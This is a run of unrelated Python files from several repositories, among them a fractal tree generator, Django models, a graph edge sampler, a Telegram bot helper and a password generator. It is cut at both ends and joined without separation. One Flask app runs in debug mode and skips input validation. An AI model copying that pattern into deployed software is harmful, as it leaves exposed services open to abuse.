self._parser.add_argument_group( title, description) return self def finish_argument_group(self): """Finish argument group. Adding a new argument group or a subcommand will finish a current argument group implicitly. 
""" self._xcl_group = None self._arg_group = None return self def set_subcommands_attrs(self, **kwargs): """Set attributes for subcommands. If used at all, it must be called before first call to :meth:`add_subcommand`. :param kwargs: same arguments as for :meth:`~argparse.ArgumentParser.add_subparsers` """ self._subcommands_attrs.update(kwargs) return self def add_subcommand(self, name, *, func=None, **kwargs): """Add subcommand. :param str name: name of the subcommand; will be available in the result after argument parsing under the name ``subcommand_name`` :param callable func: can be called when the subcommand is invoked; will be available in the result after argument parsing under the name ``subcommand_func`` :param kwargs: same arguments as for the method ``add_parser()`` which is decribed in the documentation of :meth:`~argparse.ArgumentParser.add_subparsers` """ if not self._subparsers: self._subparsers = self._parser.add_subparsers( **self._subcommands_attrs) self._xcl_group = None self._arg_group = None if 'prefix_chars' not in kwargs: kwargs['prefix_chars'] = self._parser.prefix_chars kwargs['add_help'] = False self._subcommand = self._subparsers.add_parser(name, **kwargs) if func: self._subcommand.set_defaults(**{_subcommand_func: func}) return self def finish_subcommand(self): """Finish subcommand. Adding a new subcommand will finish a current subcommand implicitly. """ self._xcl_group = None self._arg_group = None self._subcommand = None return self def finish(self): """Finish the builder and return the argument parser.""" self._xcl_group = None self._arg_group = None self._subcommand = None return self._parser fraserlove/pythonsimulations-and-generators/fractal-trees/fractal_trees.py10-100 """ Fractal Trees Generator Created 14/08/19 Developed by Generates random fractal trees by creating branch objects which are a line between two position vectors marking the start and end of the branch. These branches are then stored in an array called tree and shown to the user. 
""" import pygame, branch, math, copy, random dimensions = (3000, 1000) leaves_colour = (40,140,40) branch_colour = "white" bg_colour = "black" show_leaves = False # Choose to reveal leaves on the top layer forest_size = 20 min_branch_size = 130 # The minimum size of the root branch to start scaling down max_branch_size = 260 # The maximum size of the root branch to start scaling down branch_reduction = 0.75 # The amount to scale down each new branch from the previous branch top_layer = 10 # The maximum layers to draw class Display: """ A display object to setup and run the program with pygame """ def __init__(self, dimensions): self.dimensions = dimensions self.display = pygame.display.set_mode(dimensions) self.running = True self.forest = [] # List storing all of the trees self.tree = [] # List storing all of the branches self.leaves = [] self.setup() def setup(self): """ Setting up the display and storing our initial root branch """ self.display.fill(bg_colour) pygame.display.set_caption("Fractal Tree Generator") for i in range(forest_size): branch_size = random.randint(min_branch_size, max_branch_size) x = random.randint(0, self.dimensions[0]) a = branch.Vector(x, self.dimensions[1]) b = branch.Vector(x, self.dimensions[1] - branch_size) root = branch.Branch(a, b) self.tree.append(root) self.forest.append(self.tree) self.run() def draw(self): """ Method to draw all branches and leaves on screen """ self.display.fill(bg_colour) for branch in self.tree: branch.show(self.display, branch_colour) for leave in self.leaves: pygame.draw.circle(self.display, leaves_colour, (int(leave.x), int(leave.y)), 2) pygame.display.update() def run(self): """ Main program loop """ layer = 0 while self.running: for event in pygame.event.get(): if event.type == pygame.QUIT: self.running = False for tree in self.forest: if layer < top_layer: for i in range(len(tree)): if not tree[i].finished: tree.append(tree[i].branch_off(math.pi / random.randint(4,top_layer-layer+8), branch_reduction)) tree.append(tree[i].branch_off(-math.pi / random.randint(4,top_layer-layer+8), branch_reduction)) tree[i].finished = True layer += 1 if layer == top_layer: for i in range(len(tree)): if not tree[i].finished: if show_leaves: self.leaves.append(copy.copy(tree[i].end)) self.draw() if __name__ == "__main__": pygame.init() viewer = Display(dimensions) 10-100 """Common configure functions for system""" # Python import logging # Unicon from unicon.core.errors import SubCommandFailure log = logging.getLogger(__name__) def config_license(device, license): """ Config license on Device Args: device (`obj`): Device object license (`str`): License name Return: None Raise: SubCommandFailure: Failed configuring interface """ try: device.configure("license boot level {license}".format(license=license)) except SubCommandFailure as e: raise SubCommandFailure( 'Could not configure license {license}, Error: {error}'.format( license=license, error=e) ) Gathered CTF writeups/ctf-7867/2020/pbctf/queensarah2/graphic.py1-10 from string import ascii_lowercase from itertools import product import gizeh import numpy as np import random random.seed(1234) alphabet = ascii_lowercase + "_" bigrams = [''.join(bigram) for bigram in product(alphabet, repeat=2)] random.shuffle(bigrams) scale = 2 width = 512 * scale height = 512 * scale def draw(bs, name, theta_offset=0): surface = gizeh.Surface(width=width, height=height) r = width / 2 * 3/4 offset = [width / 2, height / 2] theta_step = (2 * np.pi) / (len(bs)) i = 0 for theta in np.linspace(0, 2 * np.pi, 
len(bs) + 1)[:-1]: t = theta + (theta_offset * theta_step / 2) xy = [r * np.sin(t) + offset[0], r * np.cos(t) + offset[1]] text = gizeh.text( bs[i], fontfamily="monospace", fontsize=20 * scale, fill=(0, 0, 0), xy=xy, angle=0 ) text.draw(surface) i += 1 surface.write_to_png("gen/" + name + ".png") even = bigrams[:16] even0 = [x for i, x in enumerate(even) if i % 2 == 0] even1 = [x for i, x in enumerate(even) if i % 2 == 1] bigrams = bigrams[16:] draw(even, "even") draw(even0, "even0") draw(even1, "even1", theta_offset=1) odd = bigrams[:15] bigrams = bigrams[15:] draw(odd, "odd") #!/usr/bin/python import sys, re, os providermap = {} permissions = [] def readProviderMap(filename): global providermap f = open(filename) for line in f: lineS = line.split(",") providermap[lineS[0]] = lineS[1].rstrip() f.close() def readStringList(filename): global permissions f = open(filename) and_pattern = re.compile('.+ and .+',re.IGNORECASE) for line in f: lineS = line.split(" ") uri = lineS[0].rstrip("/") if not checkMap(uri): parts = uri.split("/") partialuri = "" for part in parts: if (part != "content:"): partialuri = partialuri + "/" + part checkMap(partialuri) else: partialuri = part def checkMap(uri): global providermap and_pattern = re.compile('.+ and .+',re.IGNORECASE) if uri in providermap: perm = providermap[uri] if and_pattern.match(perm): perms = perm.split(" and ") for i in perms: print i else: print perm sys.stderr.write(uri+" ["+perm+"]\n") return True else: return False def main(): readProviderMap("providermap.csv"); readStringList(sys.argv[1]) if __name__ == "__main__": main() akulakov/rescaler from django.db import models class Item(models.Model): name = models.CharField(max_length=120) size = models.FloatField() notes = models.TextField(null=True, blank=True) def __unicode__(self): return self.name class Meta: ordering = ("size",) 0 from werkzeug.security import generate_password_hash, check_password_hash from flask import Flask, render_template, request, redirect, url_for from flask_sqlalchemy import SQLAlchemy from datetime import datetime app = Flask(__name__) app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///blog.db' app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False db = SQLAlchemy(app) class coins(db.Model): id = db.Column(db.Integer, primary_key=True) name = db.Column(db.String(50), unique=True) news = db.Column(db.String(1000), nullable=True) def __repr__(self): return f"" @app.route("/coins", methods=("POST", "GET")) def register(): if request.method == "POST": # здесь должна быть проверка корректности введенных данных try: p = coins(name=request.form['name'], news=request.form['news']) db.session.add(p) db.session.commit() except: db.session.rollback() print("Ошибка добавления в БД") return redirect(url_for('index')) return '''

    <!-- Reconstructed minimal form: the original markup was stripped down to the
         bare label "Coin name"; the fields below simply match what the POST
         handler reads (request.form['name'] and request.form['news']). -->
    <form method="post">
        Coin name <input type="text" name="name">
        News <textarea name="news"></textarea>
        <button type="submit">Add coin</button>
    </form>
''' if __name__ == "__main__": app.run(debug=True)#!/usr/bin/env python """ Random graph from given degree sequence. """ # Author: () # Date: 2004-11-03 08:11:09 -0700 (Wed, 03 Nov 2004) # Revision: 503 # Copyright (C) 2004-2016 by # <> # <> # <> # All rights reserved. # BSD license. from networkx import * z=[5,3,3,3,3,2,2,2,1,1,1] print(is_valid_degree_sequence(z)) print("Configuration model") G=configuration_model(z) # configuration model degree_sequence=list(degree(G).values()) # degree sequence print("Degree sequence %s" % degree_sequence) print("Degree histogram") hist={} for d in degree_sequence: if d in hist: hist[d]+=1 else: hist[d]=1 print("degree #nodes") for d in hist: print('%d %d' % (d,hist[d])) # Generated by Django 3.0.7 on 2020-07-30 04:44 from django.db import migrations, models class Migration(migrations.Migration): initial = True dependencies = [ ] operations = [ migrations.CreateModel( name='OpenShiftCurrentAdvisory', fields=[ ('log_openshift_release_advisory_id', models.AutoField(primary_key=True, serialize=False)), ('openshift_version', models.CharField(max_length=50)), ('advisory_type', models.CharField(max_length=100)), ('current_advisory_id', models.CharField(max_length=20)), ('previous_advisory_id', models.CharField(max_length=20)), ], options={ 'db_table': 'log_openshift_release_advisory', }, ), ] python/veilgraph/dataset/sample_edges.py0 #!/usr/bin/env python3 __copyright__ = """ Copyright 2018 Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. """ __license__ = "Apache 2.0" # Uniformly sample edges from a .tsv file. # Number of samples may be given as an absolute value or percentage of # edges of the provided file. # The user may choose to randomize the resulting stream file. ########################################################################### ################################# IMPORTS ################################# ########################################################################### # PEP 8 Style Guide for imports: https://www.python.org/dev/peps/pep-0008/#imports # 1. standard library imports import argparse import io from typing import List import os import pathlib import random import sys # 2. related third party imports # 3. custom local imports from veilgraph import localutil ########################################################################### ############################# READ ARGUMENTS ############################## ########################################################################### # The class argparse.RawTextHelpFormatter is used to keep new lines in help text. DESCRIPTION_TEXT = "VeilGraph edge sampler. Take a graph, sample some edges and produce a new graph file and a stream file." 
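# Hedged usage sketch (the file path and numbers below are illustrative, not taken
# from the repository): with the arguments defined just below, a typical invocation
# samples 1000 edges from a TSV graph, plans 50 stream queries, and randomizes the
# resulting stream file:
#
#   python3 sample_edges.py -i datasets/web-graph-original.tsv -c 1000 -q 50 -r
#
# Exactly one of -c/--sample-count and -p/--sample-probability may be given; the
# sanity checks further down enforce this.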
parser = argparse.ArgumentParser(description=DESCRIPTION_TEXT, formatter_class=argparse.RawTextHelpFormatter) parser.add_argument('-i', '--input-file', help="dataset name.", required=True, type=str) parser.add_argument('-o', '--out-dir', help="output directory.", required=False, type=str) parser.add_argument('-p', '--sample-probability', help='set desired sampling probability to generate the stream.', required=False, type=float, nargs='?', const=-1.0) parser.add_argument('-c', '--sample-count', help='number of samples to include in the generated stream.', required=False, type=int, nargs='?', const=-1) parser.add_argument('-r', '--randomize', help='randomize the sampled edges.', required=False, action="store_true") parser.add_argument('-d', '--debug', help='debug mode outputs helpful information.', required=False, action="store_true") parser.add_argument("-q", "--query-count", help="stream query count.", required=True, type=int) parser.add_argument("-deletion-ratio", help="number of edges to be deleted, as a fraction of stream chunk size.", required=False, type=float, default=0.20) args = parser.parse_args() # Sanitize arguments. if (not args.out_dir is None): if len(args.out_dir) == 0: print("> -out-dir must be a non-empty string. Exiting") sys.exit(1) if not (os.path.exists(args.out_dir) and os.path.isdir(args.out_dir)): print("> Provided output directory does not exist: {}. Exiting".format(args.out_dir)) sys.exit(1) # This condition checks if either are both true or both false. if args.sample_probability == args.sample_count: print("> Must supply exactly one of '-sample-count' or '-sample-probability'. Exiting.") sys.exit(1) if args.sample_count != None and args.sample_count <= 0: print("> '-sample-count' value must be a positive integer. Exiting.") sys.exit(1) if args.sample_probability != None and (args.sample_probability <= 0 or args.sample_probability > 1): print("> '-sample_probability' value must be a positive float in ]0; 1]. Exiting.") sys.exit(1) if args.query_count < 0: print("> '-query-count' must be positive. Exiting.") sys.exit(1) if args.deletion_ratio < 0.0: print("> '-deletion-ratio' must be positive. Exiting.") sys.exit(1) if args.input_file.startswith('~'): args.input_file = os.path.expanduser(args.input_file).replace('\\', '/') ########################################################################### ############################### APPLICATION ############################### ########################################################################### # Count the number of valid edge lines and note indexes of invalid input lines. input_line_count, bad_indexes = localutil.file_stats(args.input_file) bad_index_count = len(bad_indexes) # Calculate the sampling probability and stream size. if args.sample_count != None: stream_size = args.sample_count p = stream_size / (input_line_count - bad_index_count) else: p = args.sample_probability stream_size = int((input_line_count - bad_index_count) * p) out_file_name = args.input_file[:args.input_file.rfind(".")] if os.path.sep in out_file_name: out_file_name = out_file_name[args.input_file.rfind(os.path.sep) + 1:] else: out_file_name = out_file_name[args.input_file.rfind("/") + 1:] # Output directory, if it doesn't exist, will be created based on the input file name. 
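# Hypothetical, minimal illustration (not the script's own logic) of the idea
# in the comment above: derive an output directory from the input file name
# and create it when it does not exist. Relies on the `os` and `pathlib`
# imports at the top of this file; the `suffix` parameter is invented for the
# example.
def _derive_output_dir(input_file, suffix):
    """Return a sibling directory named after the input file plus a suffix, creating it if needed."""
    parent = os.path.dirname(os.path.abspath(input_file))
    base = os.path.splitext(os.path.basename(input_file))[0]
    out_dir = os.path.join(parent, "{}-{}".format(base, suffix))
    pathlib.Path(out_dir).mkdir(parents=True, exist_ok=True)
    return out_dir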
if args.out_dir is None: out_dir = os.path.dirname(args.input_file) out_file_name = out_file_name.replace('-original', '') out_file_name = out_file_name + "-" + str(stream_size) if args.randomize: if args.debug: print("> Randomizing stream file.") # Explicitly state in the file names that the stream edges were randomized. out_file_name = out_file_name + "-random" # Get parent dir of provided input file. input_file_parent_dir = os.path.abspath(os.path.join(out_dir, os.pardir)) # Create the output directory based on the target output file name. out_dir = os.path.join(input_file_parent_dir, out_file_name) # Create the output directory if it does not exist. pathlib.Path(out_dir).mkdir(parents=True, exist_ok=True) else: out_dir = args.out_dir if out_dir.startswith('~'): out_dir = os.path.expanduser(out_dir).replace('\\', '/') out_graph_path = os.path.join(out_dir, "{}-start.tsv".format(out_file_name)) out_stream_path = os.path.join(out_dir, "{}-stream.tsv".format(out_file_name)) out_deletions_path = os.path.join(out_dir, "{}-deletions.tsv".format(out_file_name)) print("> Output directory:\t\t{}".format(out_dir)) print("> Out file name base:\t\t{}".format(out_file_name)) print("> Input file:\t\t\t{}".format(args.input_file)) print("> Input line count:\t\t{}".format(input_line_count)) print("> Invalid line count:\t\t{}".format(bad_index_count)) print("> Valid line count:\t\t{}".format(input_line_count - bad_index_count)) print("\n") print("> Bad indexes:\t{}".format(bad_indexes)) print("\n") print("> Target stream file:\t\t{}".format(out_stream_path)) print("> Target stream size:\t\t{}".format(stream_size)) print("> Stream sampling probability:\t\t{}".format(p)) print("\n") print("> Target deletions file:\t{}".format(out_deletions_path)) # Sample and write resulting base graph and edge stream files. with open(args.input_file, 'r') as dataset, open(out_graph_path, 'w') as out_graph_file, open(out_stream_path, 'w') as out_stream_file: #https://stackoverflow.com/questions/19286657/index-all-except-one-item-in-python base_lines = [] stream_lines = [] sample_count = 0 valid_ctr = 0 for i, l in enumerate(dataset): # If the line is not empty and is not a comment (begins with '#'). if not i in bad_indexes: p = (stream_size - sample_count) / (input_line_count - valid_ctr) valid_ctr = valid_ctr + 1 if sample_count != stream_size and random.random() < p: #if args.debug: #print("> Stream sampled (p={}) {}/{}\t(input position: {}).".format(p, sample_count+1, stream_size, i)) sample_count = sample_count + 1 stream_lines.append(l.strip()) else: base_lines.append(l.strip()) # Efficient storage of the base graph lines to disk. if len(base_lines) == io.DEFAULT_BUFFER_SIZE: out_graph_file.write('\n'.join(base_lines) + "\n") base_lines = [] if valid_ctr == input_line_count: break # Write the last set of edges, whose number was less than 'io.DEFAULT_BUFFER_SIZE'. if len(base_lines) > 0: len_diff = stream_size - len(stream_lines) if args.debug: print("> Length difference:\t{}".format(len_diff)) if len_diff > 0: aux_draw = random.sample(base_lines, len_diff) print("> Stream supplement draw:\t{}".format(aux_draw)) stream_lines = stream_lines + aux_draw base_lines = [l for l in base_lines if l not in aux_draw] if len(base_lines) > 0: out_graph_file.write('\n'.join(base_lines) + "\n") # Is stream order randomization required? if args.randomize: random.shuffle(stream_lines) # Store the stream edges to disk. 
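# Compact, hypothetical restatement (not part of the original script) of the
# sequential selection sampling used in the loop above: each remaining line is
# kept with probability (samples still needed) / (lines still unseen), which
# yields exactly k lines drawn uniformly without replacement, in input order.
# Uses the `random` import already present at the top of this file.
def _selection_sample(lines, k):
    """Return k lines sampled uniformly at random, preserving their original order."""
    chosen, remaining, needed = [], len(lines), k
    for line in lines:
        if needed > 0 and random.random() < needed / remaining:
            chosen.append(line)
            needed -= 1
        remaining -= 1
    return chosen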
out_stream_file.write('\n'.join(stream_lines) + "\n") out_stream_file.flush() # Get the chunk properties for the generated stream. chunk_size, chunk_sizes, _, stream_edge_count, _ = localutil.prepare_stream(out_stream_path, args.query_count) print("> Stream chunk size:\t\t{}".format(chunk_size)) print("> Stream chunk count:\t\t{}".format(len(chunk_sizes))) print("> Stream edge count:\t\t{}".format(stream_edge_count)) print('> Stream line count:\t\t{}'.format(len(stream_lines))) print('\n') # Number of edges deletions sent each time a block of the update stream is sent. deletion_size = int(args.deletion_ratio * chunk_size) # On what stream block are we? block_acc = 0 base_graph_index_limit = valid_ctr + bad_index_count - stream_edge_count deletions = [] for i in range(len(chunk_sizes)): if args.debug: print('> Drawing {} lines from interval [{};{}={} + {}]'.format( deletion_size, bad_index_count, base_graph_index_limit + block_acc, base_graph_index_limit, block_acc)) # Draw a sample from the original graph plus all the previous chunk blocks we've already iterated over. draw_interval_range = range(bad_index_count, base_graph_index_limit + block_acc) # PROBLEM: since the stream was shuffled, for a base graph with 10000 edges and a stream of size 1000, it's possible that stream element 0015 (belonging to first stream chunk before shuffling) was shuffled into position 0859. This means there will be a deletion order for an edge that hasn't been added yet. print("> Draw interval range:\t{}".format(draw_interval_range)) # Keep drawing samples until there isn't a single repetition in 'deletions'. while True: del_block = random.sample(draw_interval_range, deletion_size) repetitions = 0 for j in del_block: if j in deletions: repetitions = repetitions + 1 break if repetitions == 0: break deletions = deletions + del_block # 'block_acc' sets the upper limit for the sampling procedure. block_acc = block_acc + chunk_sizes[i] # 'deletions' contains indexes associated with the sampled edges to be deleted. # Need to retrieve the associated edge strings. deletion_strings = len(deletions) * [''] if args.debug: print("> Deletion count:\t{}".format(len(deletions))) print("> Base graph index limit:\t{}".format(base_graph_index_limit)) #base_deletion_indexes = [] base_deletion_indexes = set() aux = {} for i in range(len(deletions)): # String is part of the base graph file. if args.debug: print("> Current deletion:\t{}\t{}".format(i, deletions[i])) # If current edge to delete is part of the base graph ('..-start.tsv') if deletions[i] < base_graph_index_limit: #base_deletion_indexes.append(deletions[i]) base_deletion_indexes.add(deletions[i]) aux[deletions[i]] = i # String is part of a specific stream block. else: # Find the index inside the specific block and retrieve the string. global_stream_index = deletions[i] - base_graph_index_limit single_block_index = chunk_size * int((global_stream_index / chunk_size)) inner_block_index = global_stream_index - single_block_index single_block_index = int(single_block_index / chunk_size) if args.debug: print("> Drawing from block:\t{}\t({}:{})".format(global_stream_index, single_block_index, inner_block_index)) print("> deletion_strings[{}] = {}".format(i, stream_lines[global_stream_index])) deletion_strings[i] = stream_lines[global_stream_index] # Reread the input file to write the deletions file. 
#with open(args.input_file, 'r') as dataset, open(out_deletions_path, 'w') as out_deletions_file: with open(out_graph_path, 'r') as dataset, open(out_deletions_path, 'w') as out_deletions_file: for i, l in enumerate(dataset): #if (i % 20000 == 0): # print('> Input file line:\t{}'.format(i)) # print('> {}'.format(l.strip())) if i in base_deletion_indexes: deletion_strings[aux[i]] = l.strip() out_deletions_file.write('\n'.join(deletion_strings) + "\n") out_deletions_file.flush() if args.debug: print("\n") # Check if the deletion stream order is coherent with the update stream order. with open(out_deletions_path, 'r') as out_deletions_file, open(out_stream_path, 'r') as out_stream_file: deletion_lines = out_deletions_file.readlines() stream_lines = out_stream_file.readlines() curr_del_block = 1 for i in range(len(deletion_lines)): # Set current max allowed stream file index. if i % deletion_size == 0: curr_del_block = curr_del_block + 1 max_stream_index = curr_del_block * chunk_size curr_del_line = deletion_lines[i].strip() # If the current deletion line exists in the edge stream. if curr_del_line in stream_lines: curr_index = stream_lines.index(curr_del_line) # If its index is below the currently allowed max index. if curr_index >= max_stream_index: print("> Illegal deletion position.") print("> edge {} is at pos {} in the stream and the limit is {}".format(curr_del_line, curr_index, max_stream_index)) sys.exit(1)import sys def adjacency(mat_, g1, g2): mat_[g1].append(g2) mat_[g2].append(g1) return mat_ def dfs(gallery, visited): visited[gallery] = True children = [0]*len(cases) installed = 0 for adj_gallery in adj_mat[gallery]: if not visited[adj_gallery]: case, installation = dfs(adj_gallery, visited) children[case] += 1 installed += installation if children[cases.get('unwatched')]: installed += 1 return cases.get('installed'), installed if children[cases.get('installed')]: return cases.get('watched'), installed return cases.get('unwatched'), installed def installCamera(): installed = 0 for gallery in range(g): if not visited[gallery]: case, installation = dfs(gallery, visited) installed += installation if case == cases.get('unwatched'): installed += 1 return installed input_ = lambda: sys.stdin.readline() if __name__ == '__main__': C = int(input_()) cases = {'unwatched': 0, 'watched': 1, 'installed': 2} for _ in range(C): g, h = map(int, input_().split()) adj_mat = [[] for _ in range(g)] # installed = 0 visited = [False] * g for _ in range(h): g1, g2 = map(int, input_().split()) adj_mat = adjacency(adj_mat, g1, g2) print(installCamera()) import os from fotahubclient.json_document_models import ArtifactKind, LifecycleState, DeployedArtifacts, DeployedArtifact class DeployedArtifactsTracker(object): def __init__(self, config): self.config = config self.deployed_artifacts = DeployedArtifacts() def __enter__(self): if os.path.isfile(self.config.deployed_artifacts_path) and os.path.getsize(self.config.deployed_artifacts_path) > 0: self.deployed_artifacts = DeployedArtifacts.load_deployed_artifacts(self.config.deployed_artifacts_path) return self def register_os(self, name, deployed_revision, rollback_revision=None): self.__register_artifact(name, ArtifactKind.operating_system, deployed_revision, rollback_revision, LifecycleState.running) def register_app(self, name, deployed_revision, rollback_revision=None): self.__register_artifact(name, ArtifactKind.application, deployed_revision, rollback_revision, LifecycleState.available) def register_fw(self, name, deployed_revision, 
rollback_revision=None): self.__register_artifact(name, ArtifactKind.firmware, deployed_revision, rollback_revision, LifecycleState.running) def __register_artifact(self, name, kind, deployed_revision, rollback_revision, lifecycle_state): deployed_artifact = self.__lookup_deployed_artifact(name, kind) if deployed_artifact is not None: deployed_artifact.reinit(deployed_revision, rollback_revision, lifecycle_state) else: self.__append_deployed_artifact( DeployedArtifact( name, kind, deployed_revision, rollback_revision, lifecycle_state ) ) def erase_app(self, name): self.__erase_artifact(name, ArtifactKind.application) def erase_fw(self, name): self.__erase_artifact(name, ArtifactKind.firmware) def __erase_artifact(self, name, kind): deployed_artifact = self.__lookup_deployed_artifact(name, kind) if deployed_artifact is not None: self.__remove_deployed_artifact(deployed_artifact) def record_app_deployed_revision_change(self, name, deployed_revision, updating=True): deployed_artifact = self.__lookup_deployed_artifact(name, ArtifactKind.application) if deployed_artifact is not None: deployed_artifact.amend_revision_info(deployed_revision, updating) else: raise ValueError("Failed to record revision change for unknown application named '{}'".format(name)) def record_fw_deployed_revision_change(self, name, deployed_revision, updating=True): deployed_artifact = self.__lookup_deployed_artifact(name, ArtifactKind.firmware) if deployed_artifact is not None: deployed_artifact.amend_revision_info(deployed_revision, updating) else: raise ValueError("Failed to record revision change for unknown firmware named '{}'".format(name)) def record_app_lifecycle_status_change(self, name, lifecycle_state=None, status=True, message=None): deployed_artifact = self.__lookup_deployed_artifact(name, ArtifactKind.application) if deployed_artifact is not None: deployed_artifact.amend_lifecycle_info(lifecycle_state, status, message) else: raise ValueError("Failed to record lifecycle status change for unknown application named '{}'".format(name)) def __lookup_deployed_artifact(self, name, kind): for deployed_artifact in self.deployed_artifacts.deployed_artifacts: if deployed_artifact.name == name and deployed_artifact.kind == kind: return deployed_artifact return None def __append_deployed_artifact(self, deployed_artifact): self.deployed_artifacts.deployed_artifacts.append(deployed_artifact) def __remove_deployed_artifact(self, deployed_artifact): self.deployed_artifacts.deployed_artifacts.remove(deployed_artifact) def __exit__(self, exc_type, exc_val, exc_tb): DeployedArtifacts.save_deployed_artifacts(self.deployed_artifacts, self.config.deployed_artifacts_path) aponsero/Haplo_mock_generator #!/usr/bin/env python3 from Bio import SeqIO from Bio.Seq import Seq from Bio.SeqRecord import SeqRecord import random import itertools import sys, getopt import argparse def get_args(): parser = argparse.ArgumentParser(description='create a new haplotype with random mutations') parser.add_argument('-f', '--file', help='file_genome', type=str, metavar='FILE', required=True) parser.add_argument('-n', '--name', help='name_haplotype', type=str, metavar='NAME', required=True) parser.add_argument('-m', '--mutation', help='mutation rate', type=float, metavar='MUTATION', required=True) parser.add_argument('-o', '--output', help='output directory', type=str, metavar='OUTPUT', required=True) return parser.parse_args() def mutate(orig_string, mutation_rate): bases = "ACGT" result = "" mutations = [] for base in orig_string: if random.random() < 
mutation_rate: new_base = bases[bases.index(base) - random.randint(1, 3)] # negatives are OK result += new_base mutations.append((base, new_base)) else: result += base print(mutations) return result def main(): args = get_args() outfile= args.output infile=args.file haplo_name=args.name mutation_rate=args.mutation for record in SeqIO.parse(infile, "fasta"): with open(outfile, "w") as output_handle: string=record.seq #print(string) result = mutate(string, mutation_rate) #print(result) new_seq=Seq(result) new_record= SeqRecord(new_seq, id=haplo_name) SeqIO.write(new_record, output_handle, "fasta") if __name__ == "__main__":main() import os from dotenv import dotenv_values from telegram import Update from telegram.ext import CallbackContext def chunks(itr, mapper, max_n=64): """Yield successive n-sized chunks from lst.""" res = [] i = 0 for row in itr: if i % max_n == 0 and res: yield res res = [] res.append(mapper(row)) i += 1 yield res def kcal_calc(weight, height, age, sex, activity, **kwargs): if sex == 0: bmr = 88.36 + (13.4 * weight) + (4.8 * height) - (5.7 * age) else: bmr = 447.6 + (9.2 * weight) + (3.1 * height) - (4.3 * age) if activity == 0: bmr *= 1.2 elif activity == 1: bmr *= 1.375 elif activity == 2: bmr *= 1.55 elif activity == 3: bmr *= 1.725 elif activity == 4: bmr *= 1.9 return bmr def send_like_product(update: Update, context: CallbackContext, name: str): db_connect = context.bot_data['db_connect'] result = db_connect.products.select_like(name, 20) if result: res_str = 'Likes products\n' res_str += 'Product: F\\P\\C Kcal\n' for row in result: res_str += '"{name}": {fat}\\{protein}\\{carbohydrates} {kcal}\n'.format(**row) update.message.reply_text(res_str) else: update.message.reply_text('Not found') def get_db_conf(): return dotenv_values(os.path.join(os.path.dirname(__file__), '.env.db')) def get_bot_conf(): return dotenv_values(os.path.join(os.path.dirname(__file__), '.env.bot')) 0 import cv2 import numpy as np cap = cv2.VideoCapture(0) while True: _, frame = cap.read() hsv = cv2.cvtColor(frame,cv2.COLOR_BGR2GRAY) lower_white = np.array([0,0,0]) upper_white = np.array([255,255,255]) mask = cv2.inRange(hsv,lower_white,upper_white) res = cv2.bitwise_and(frame,frame,mask = mask) cv2.imshow('frame',frame) cv2.imshow('mask',mask) cv2.imshow('res',res) k = cv2.waitKey(5) & 0xFF if k == 27: break cv2.destroyAllWindows() cap.release()import random # https://simple.wikipedia.org/wiki/Leet letters_nums = {"b": "8", "e": "3", "i": "1", "o": "0", "s": "5", "t": "7"} # Based on dividing the keyboard into two halfs.. -1 for left side and 1 for right side. 
letters_map = {'a': -1, 'c': -1, 'd': -1, 'e': -1, 'f': -1, 'q': -1, 'r': -1, 's': -1, 'v': -1, 'w': -1, 'x': -1, 'z': -1, "1": -1, "2": -1, "3": -1, "4": -1, "5": - 1, "!": -1, 'b': 1, 'g': 0, 'h': 1, 'i': 1, 'j': 1, 'k': 1, 'l': 1, 'm': 1, 'n': 1, 'o': 1, 'p': 1, 't': 0, 'u': 1, 'y': 1, "6": 1, "7": 1, "8": 1, "9": 1, "0": 1} def read(lang_file): # Openning the language's words file and loading it into a list with open(lang_file, "r") as file: words_lst = list(file) # Randomizing the words list random.shuffle(words_lst) # Words dictionary with length and whether easy typing or not words = {} # Deciding the word's length and calculating a score for easy tpying for word in words_lst: word = word.strip("\n") if word not in words: words[word] = {"len": len(word), "easy": False} easy_score = 0 for letter in word: if letter in letters_map: easy_score += letters_map[letter] # If the words divide almost equally between the two sides of the keyboard, congrats, it is an easy word! if easy_score in [-1, 0, 1]: words[word]["easy"] = True return words def generate(words, min_len, max_len, min_word_len, max_word_len, words_per_pwd=4): # Filtering words based on length filtered_words = {} for word in words: if min_word_len <= words[word]["len"] <= max_word_len: filtered_words[word] = len(word) used = {} passwords = [] # Generating passwords to fit the chosen criteria total = 0 while total < 10: password = "" password_lst = [] current_word_size = max_len for word in filtered_words: if ((word not in used and len(password_lst) < words_per_pwd) and ((len(password)+filtered_words[word] < min_len) or (filtered_words[word] < current_word_size))): password += word password_lst.append(word.lower()) used[word] = "USED" current_word_size = current_word_size - filtered_words[word] if (len(password_lst) == 4) and (min_len <= len("".join(password_lst)) <= max_len): passwords.append(password_lst) password = "" current_word_size = max_len total += 1 return passwords def easy(words): # Filtering based on easy typing easy = {} for word in words: if words[word]["easy"] == True and word not in easy: easy[word] = {"len": words[word]["len"]} return easy def numbers(passwords): # Doing letter/number substitutions for i in range(len(passwords)): for j in range(len(passwords[i])): passwords[i][j] = list(passwords[i][j]) for k in range(len(passwords[i][j])): if passwords[i][j][k] in letters_nums: passwords[i][j][k] = letters_nums[passwords[i][j][k]] passwords[i][j] = "".join(passwords[i][j]) return passwords ESA-CCI-ODP/mjml-stub from ._head_base import HeadComponent from mjml.helpers import omit __all__ = ['MjAttributes'] class MjAttributes(HeadComponent): def handler(self): add = self.context['add'] _children = self.props.children for child in _children: tagName = child['tagName'] attributes = child['attributes'] children = child['children'] if tagName == 'mj-class': attr_name = attributes['name'] add('classes', attr_name, omit(attributes, 'name')) assert not children, 'not yet implemented' # upstream: # reduce( # children, # (acc, { tagName, attributes }) => ({ # ...acc, # [tagName]: attributes, # }), # {}, # ), #def reducer(acc, tn_attr): # tagName, attributes = tn_attr # return {'tagName': attributes, **acc} #add('classesDefault', attr_name, reduce(children, reducer, {})) else: if not attributes: # TODO: not present upstream continue add('defaultAttributes', tagName, attributes) import os, sys, array, time import numpy as np from optparse import OptionParser from basic.common import checkToSkip, printStatus INFO = 
